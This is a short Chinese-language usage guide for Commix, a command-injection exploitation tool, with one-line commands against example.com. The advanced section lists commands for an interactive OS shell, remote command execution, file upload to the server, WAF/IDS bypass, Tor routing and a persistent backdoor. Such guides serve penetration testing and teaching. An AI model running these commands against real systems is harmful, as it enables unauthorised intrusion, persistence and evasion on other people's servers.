Commix 基础用法和高级用法
基础用法
Commix 是一个自动化的命令行注入工具,用于检测和利用 Web 应用程序中的命令注入漏洞。以下是基本使用方法:
-
基本扫描
python commix.py -u "http://example.com/vuln.php?id=1" -
指定注入点
python commix.py -u "http://example.com/vuln.php?id=1" --data="user=admin" -
使用 POST 请求
python commix.py -u "http://example.com/vuln.php" --data="username=admin&password=test" -
指定参数
python commix.py -u "http://example.com/vuln.php?id=1" -p "id" -
使用代理
python commix.py -u "http://example.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080" -
设置用户代理
python commix.py -u "http://example.com/vuln.php?id=1" --agent="Mozilla/5.0"
高级用法
-
使用特定的操作系统 shell
python commix.py -u "http://example.com/vuln.php?id=1" --os-cmd="uname -a" -
交互式 shell
python commix.py -u "http://example.com/vuln.php?id=1" --os-shell -
文件上传
python commix.py -u "http://example.com/upload.php" --file-upload="/local/path/file.txt" --file-dest="/remote/path/file.txt" -
暴力破解参数
python commix.py -u "http://example.com/vuln.php" --batch --all -
使用 Tor 网络
python commix.py -u "http://example.com/vuln.php?id=1" --tor --tor-port=9050 -
绕过 WAF/IDS
python commix.py -u "http://example.com/vuln.php?id=1" --tamper="space2comment" -
多线程扫描
python commix.py -u "http://example.com/vuln.php?id=1" --threads=5 -
自定义注入标记
python commix.py -u "http://example.com/vuln.php?id=1*" --prefix="'" --suffix="'" -
持久化后门
python commix.py -u "http://example.com/vuln.php?id=1" --backdoor -
从文件读取目标
python commix.py -l targets.txt -
使用特定的编码技术
python commix.py -u "http://example.com/vuln.php?id=1" --encode="base64" -
时间延迟检测
python commix.py -u "http://example.com/vuln.php?id=1" --time-sec=5